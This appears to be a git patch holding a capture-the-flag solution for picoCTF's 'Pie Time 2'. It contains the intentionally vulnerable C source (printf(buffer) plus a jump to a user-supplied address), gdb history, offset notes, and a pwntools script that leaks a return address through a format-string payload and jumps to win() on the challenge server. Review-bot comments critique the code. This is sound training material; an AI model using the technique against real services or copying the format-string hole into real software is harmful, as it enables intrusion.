From a3a7081d42b2061b7dcf7178528920abd8be497f Mon Sep 17 00:00:00 2001 From: THEON-1 Date: Thu, 4 Dec 2025 11:53:31 +0100 Subject: [PATCH] Pie Time 2 --- pie_time_2/.gdb_history | 122 ++++++++++++++++++++++++++++++++++++++++ pie_time_2/notes.md | 30 ++++++++++ pie_time_2/sol.py | 24 ++++++++ pie_time_2/vuln | Bin 0 -> 17384 bytes pie_time_2/vuln.c | 56 ++++++++++++++++++ 5 files changed, 232 insertions(+) create mode 100644 pie_time_2/.gdb_history create mode 100644 pie_time_2/notes.md create mode 100755 pie_time_2/sol.py create mode 100755 pie_time_2/vuln create mode 100644 pie_time_2/vuln.c diff --git a/pie_time_2/.gdb_history b/pie_time_2/.gdb_history new file mode 100644 index 0000000..a113728 --- /dev/null +++ b/pie_time_2/.gdb_history @@ -0,0 +1,122 @@ +r +Quit +r +b *0 +r +step +step +stepi +next +r +nexti +stepi +break main +r +b +clear 3 +clear +exit +break main +r +stepi +stepi +stepi +nexti +step +step +step +step +step +step +step +step +step +step +step +step +step +step +step +exit +b main +r +nexti +stepi +nexti +stack-explore +stackf +hexdump +hexdump $sp +hexdump $sp 128 +hexdump $sp 512 +ad40a7a0 +b main +r +stepi +nexti +r +nexti +step +nexti +stackf +r +nexti +stepi +nexti +stackf +r +nexti +stepi +nexti +stackf +exit +b call_functions +r +nexti +stackf +r +nexti +nexti +stackf +r +nexti +stackf +r +nexti +nexti +stackf +r +nexti +stackf +r +nexti +nexti +stackf +r +nexti +exit +b call_functions+80 +b *call_functions+80 +r +nexti +stackf +r +nexti +stackf +55559311.f7e0a7a0.f7e0a7a0.55559328.0.340.f7e095c0.252e7825 +r +exit +b *call_functions+85 +r +stackf +55559311f7e0a7a0f7e0a7a0555593310340f7e095c078257825782578257825782578257825a980000 +r +stackf +55559311f7e0a7a0f7e0a7a0555593410340f7e095c0782578257825782578257825782578257825782578257825a0051675000ffffcff055555441ffffd090f7c27635f7fc2000ffffd118ffffd050 +r +stackf +r +stackf +r +stackf +exit diff --git a/pie_time_2/notes.md b/pie_time_2/notes.md new file mode 100644 index 0000000..269cbf6 
--- /dev/null
+++ b/pie_time_2/notes.md
@@ -0,0 +1,30 @@
+# find main layout with `objdump -d --disassemble=main vuln`
+```assembly
+0000000000001400
:
+ 1400: f3 0f 1e fa endbr64
+ 1404: 55 push %rbp
+ 1405: 48 89 e5 mov %rsp,%rbp
+ 1408: 48 8d 35 9a fe ff ff lea -0x166(%rip),%rsi # 12a9
+ 140f: bf 0b 00 00 00 mov $0xb,%edi
+ 1414: e8 57 fd ff ff call 1170
+ 1419: 48 8b 05 f0 2b 00 00 mov 0x2bf0(%rip),%rax # 4010
+ 1420: b9 00 00 00 00 mov $0x0,%ecx
+ 1425: ba 02 00 00 00 mov $0x2,%edx
+ 142a: be 00 00 00 00 mov $0x0,%esi
+ 142f: 48 89 c7 mov %rax,%rdi
+ 1432: e8 49 fd ff ff call 1180
+ 1437: b8 00 00 00 00 mov $0x0,%eax
+ 143c: e8 86 fe ff ff call 12c7
+ 1441: b8 00 00 00 00 mov $0x0,%eax
+ 1446: 5d pop %rbp
+ 1447: c3 ret
+```
+# find `main` and `win` locations
+```
+000000000000136a g F .text 0000000000000096 win
+0000000000001400 g F .text 0000000000000048 main
+```
+# find buffer offset to read return address into `main` via gdb
+- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
+- return value $\leftrightarrow$ *main+65 after dot
+
diff --git a/pie_time_2/sol.py b/pie_time_2/sol.py
new file mode 100755
index 0000000..ac14eaf
--- /dev/null
+++ b/pie_time_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+from pwn import *
+
+#conn = process("./vuln")
+conn = remote('rescued-float.picoctf.net', 49587)
+conn.recvuntil(b'name:')
+conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
+conn.recvuntil(b'.')
+return_addr = int(conn.recvline(), 16)
+log.info(f"received return addr: {return_addr}")
+conn.recvuntil(b'12345: ')
+
+main_offset = 0x1400
+win_offset = 0x136a
+call_fun_ret_offset = 65
+
+main_addr = return_addr - call_fun_ret_offset
+win_offset = main_addr - main_offset + win_offset
+
+conn.sendline(f'{hex(win_offset)}'.encode())
+conn.recvline()
+conn.interactive()
+
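Review bot: `win_offset` means two different things in the sol.py hunk — first the static `.text` offset of `win` (`0x136a`), then on the `win_offset = main_addr - main_offset + win_offset` line it is overwritten with the computed absolute address, so the name misdescribes the value passed to the following `sendline`. Give the result its own name, e.g. `win_addr = main_addr - main_offset + win_offset` and `conn.sendline(hex(win_addr).encode())`; the `f'{hex(...)}'` wrapper adds nothing over `hex(...)`. The `#!/usr/bin/env python` shebang may resolve to a Python 2 interpreter on older hosts, where the f-string in the `log.info` call is a syntax error, so `python3` is the more portable choice. A short header comment naming the challenge and stating that `0x1400`, `0x136a` and `65` are taken from the objdump/gdb observations in notes.md would keep the constants traceable if the binary is ever rebuilt.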
diff --git a/pie_time_2/vuln b/pie_time_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..058a207f75f2989c1b864fc8fdb9902d2e4f4e92 GIT binary patch literal 17384 zcmeHPeQX@X6`%9Pi39QZ0tuLWE+MI$24C#pge27E&h{m1PvqpCD5s_G)r+7yC0zFcUseQ$Q& zdUt&%D%8K)8|&^j@AuxDnSDDuyK_6^hl6cf%3Ll+$<4mVP#T$UFn*z^`GUv*_}NBQ z3E#`vGBz9JS)4QUegi;jqzh$stPs2#5dEq#QvjD3G$W)IBBEchR5RDm5HhbJqhC2@ zh3v%Ni$V!WZ`LQFGbD+Bo7gFikI?FevFWTe>^mFnctZG%3M4-i(XUtd^$I`2No)`# zLW(CgA3qyKJe??k4wJ;c8FTvW5q?f=5%z>w2d3Q@wa90wZ>R8kTH?hpC+;<9Mo9JD z34R!t|1{BQ-X-cQb{>w2_!ElovbFJ8*M^3*@knhvmdy6m_HEoyyP?6CN%_|CCSbd; z4(wA~w|6ioW&}AAMt&|92pRRck+<*t-GRj7M+cr>^N#%U4<_Gvg2xZbz&g-3v@wqV88+bZGUTpB14uPXk1RQ_zLMzf2+?613d?sBQ$3WQDT`?c+(~&6AmS# zEEDTahT^O@t7Sly(L&+-lyJ{|N;DMXY`7zUHp zzDb6h3) z!tDl+*Dkh`(wK#(vQRf};jxcVnzZoNi+sw$Tl+8dGaR3Ate`~w33(bnP}e8QnFD!@ z8>ImYPh%VE9<%T?Mk7CL;js=%M=iW{96x5^v2IGoExfp;bJYn8e-#-6zF^_!S@;nP z4;{cv=PbO(WEmT^@KqMRlr2S|6oFC%N)aeU;D0Fs?^P}PSRQ<fkB(?% z`lvkk%Zk(dF!l9KKY%)8QS-tCO`34UDt=Xj1LU?iSwq64?6jYQ>Kg$4*7|n znle5x6024tbwL?r_N49CFYhH#+3?4!PDLuX4ys9r8k}T>o}! z?)<%S?sa+ajme$uZA0aMgEJrxRi-#JRs-k@^YDwp`@`~3;|<^|50zhouxUzL2&euP z(BY|{tB+MJAAo4F(*nVM0+mDSUq@JdMb1sir!L(tpPF*Zt~2uaE7}4m;CrHg3Vkff z<4XS6KL#3q0cw_A(;*KweigHF?xHqNKHPW+gz?xFT_2CY$vIR04Uk>?z}KuF{U;8B z5;Gm(2MyX;30}Lw>m;^xd;)T&cJQsvh^6_(*b^X_;Elu=72_M2!>iFZJfzZAOd7v&K^$AkB;FLW0;1tVV2lN=y5ulC3 z{TL0P252hxe=PXXKNeNJ9Q+7mpGB93Jm>}<{7BD^oy1FGyvm}!3G&01Rt>Fx3XbF? zUMk~val7)#HH^IoGJ6Rx=$A2vm9~P`2+|?&;5j^HkD#7kPl3DIh8o?g84G-=HTPrY5wJwSCEiNxR=cC2Y+RFegu~f%T8-Q+#ggF^E<&@T=l9i;Tr2W}MFW}9R+9x%BQL5{!Uw2Ex`ppts74Ktrr?S$) zRPsiaX3==4+o$zutT~iSrZfp(W=YXl9H-wf6I|@RZ4V&MT^@Ny*N*_UPwM*ffDypo z0Iqyj*EPV(ysp0ixCRhkV7vk-0Y=`_bwA+qfDyoz@9X-H0P)={Cf5VIn5)n0T0Cz~ z#jxOU&B1XfAAa#*tYr>=-Lew04e*(~r0b)|d%Rmb)pt}~eXwGH-M(n^=WkiL0%

3`>dKyi)*AYA zz<(d~-?Zt6xLyKo96n1R7P3|UFjphP;3p6^4~|;~8x@Hy9`D!6T0PZ|yMrESXjafu zbELe*Q+H^#?AbUtXRF7b^lS`x>H?mcCXdwQsc!Okn>-c#U3fc`(+lNT-}_*ZrBsSQ zDFUSklp;`yKq&&H2$UjFiopL%1ZdqDtrLSsWS$7;Q6R)*0p2U|bPgvBkZv%*T#vR` z$nf~j(;|ViE)C}lm`MM@6+MOWF?7c`jMkvxJO$H21I%yX z#yZ8iDST6e3Flsz#9=U6+jYG`vkK8b;;Ti5+C3@kXzdr(&*w;>BRhD5#E%cE;}pD+ z;_?M?VDRRU^t?ov)^YiS(En4&bR44E{~FM`ZD)aX;(YrB?iAQ5uvg%Kz+r*M1fCE$ zB5+jTm_TQJpC(uM4U4VK&6}l~j;?G{%SxMk4ZgbC`Ye~~A6i%Et84JBTW#>4RwAxt zcA4w@t=715lh&u(c{ii==XQP;`*ML3hoBi6(!&P43ytrW(g;bFDu*rgam3=X%sKgD0k60IZn*4l5*Rw*`gPT>GcIMnAumG4gK9I%=!d z&1iI-W^ovr#ondi%v9jGTLy8Pbi~agc*(k$7PuP)PvbaW7aDMps&Q%t`n<3ZFvlFLqqt;pHq~d-<*q<)K|Dg!~W)Xfa#KFBE+Jhn(U%@T@!UcQ&@6#YRJd`|HD#Ugh8`zPpLgpU`l$2z|- z6tF_r(>S?S@I%0(z1Ly?q_C$47+KhVoAW}jz|V^CXNvG+Mfg1M7$0YQt^hAt>Z5Em z+!t4nV8w7+%V=3xDHCSXn=TYBp}@9|q>B4OA}OUip6Uw4m57!~XOvL3kA+i--ngo% z5#PqT4fTbMa5G3u38mAaeg%I0PxrHE8eRq{k!&K-4=xr-0ZYwhdLSE5LX#9_%dWt- zpc35PqQHI+yIq7SEq8AZY-??{YxrgppkS|*5|l*=a?38JY;D`o6lha+Y}v9q*sin( zn%aU`D&L|K&SZIuaXSodeDV8fr^=`8N-;LV*zLoicwC8QlVL5EN@n;L8@mDDR%53W zH4@T7VndBX<=CAwt!)rnbEX+=F5jnPr)KQLv8&M|W2fNMLwk(fHn5?`c=4n3gp!fC z3j2ci<{_tteSeM;$)tn>Y}VNUMZsPoC7V&<)J;bnPd+;cTZ0s(E0YoR@x4M~7m>XZ zzLm*N+4nU~>u%+npQdGgCKcFHL>&tE8Wr3?WZ%wYFM;_o{Ru791*oMB?4ca&l2X&X z%m;6&R9|;8>+4O!%c`{2Z=t%fG1xB{iwG*v)LN^Bx*0d`31xbiFVdfcDh$-phUS2p z&Ol$X2@2@aYCMDvBG((&n2$%)2U%Zt3Pj9g)G+gDD!fDU;dKetDc;+BYLB=Qdm>O8 zNk$pQC24q29;yl@Vo;dj4rh${U^qy?C2k#8K4TuA%-~i8_k1JaxP^(3=B);6*is(x zCivhKk^DCbe?kd#)c2<$6XN?lYohxPajlTC`qO-bP$ENtPJi6*_#wA*>UAG#_`iKLmQ5i<3XiZwSXQxR9`om?eLjH^+d(LneQk2N60SkVSFeVIBM_MK~!8seb42e@pl` z2|N1zflv|$jQ$uir~fm+p$U}_4-G~V=$v^t&;Qd7e@XZej*8+49L2Ne9R4&vBqaM{ z{wEy%@UUehfg?gBpz;XuxypL{^c+Q4F0Lo1KglN@{xmNotRzE$&iMUG_|y4kk}wqb zq!0<{{E_@y$YA@)pXRxQd&y9sv;Nl{{!@}+NZ5mgTavT>i=e}~C54IRPqZ)HX-_iY zyWk76f774l*FCjBLLxgunwE*b3<~VKR6otb>HiGS{}aIL4-@&(`Trqsc!=arzxQ>D z2kB#=vnKKn%p`>~ZEzXS!`_H@0 Luvp}9aER>Rl=_X% literal 0 HcmV?d00001 
diff --git a/pie_time_2/vuln.c b/pie_time_2/vuln.c
new file mode 100644
index 0000000..51b81dd
--- /dev/null
+++ b/pie_time_2/vuln.c
@@ -0,0 +1,56 @@
+#include
+#include
+#include
+#include
+
+void segfault_handler() {
+ printf("Segfault Occurred, incorrect address.\n");
+ exit(0);
+}
+
+void call_functions() {
+ char buffer[64];
+ printf("Enter your name:");
+ fgets(buffer, 64, stdin);
+ printf(buffer);
+
+ unsigned long val;
+ printf(" enter the address to jump to, ex => 0x12345: ");
+ scanf("%lx", &val);
+
+ void (*foo)(void) = (void (*)())val;
+ foo();
+}
+
+int win() {
+ FILE *fptr;
+ char c;
+
+ printf("You won!\n");
+ // Open file
+ fptr = fopen("flag.txt", "r");
+ if (fptr == NULL)
+ {
+ printf("Cannot open file.\n");
+ exit(0);
+ }
+
+ // Read contents from file
+ c = fgetc(fptr);
+ while (c != EOF)
+ {
+ printf ("%c", c);
+ c = fgetc(fptr);
+ }
+
+ printf("\n");
+ fclose(fptr);
+}
+
+int main() {
+ signal(SIGSEGV, segfault_handler);
+ setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+ call_functions();
+ return 0;
+}
\ No newline at end of file
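Review bot: `printf(buffer)` in `call_functions` passes user input read by the preceding `fgets` line straight to `printf` as the format string (CWE-134); the fixed form is `printf("%s", buffer);` or `fputs(buffer, stdout);`, and `-Wformat-security` flags the original at compile time. If this file is committed on purpose as the unmodified challenge source, say so in a comment at the top, e.g. `/* Challenge source as distributed; intentionally vulnerable, kept unmodified for reference. */`, so nobody later "fixes" it and breaks the offsets recorded in notes.md. Smaller defects in the same hunk: `win` is declared `int` but never returns a value; `char c` holding the result of `fgetc` makes the `c != EOF` comparison unreliable and should be `int c`; the `scanf("%lx", &val)` return value is unchecked, so `val` may be uninitialized when `foo()` is called; and `segfault_handler` calls `printf` and `exit`, neither of which is async-signal-safe. The four `#include` lines appear here with their header names missing, which looks like a rendering artifact of the angle-bracket names being dropped rather than something in the commit itself, but it is worth confirming against the raw file.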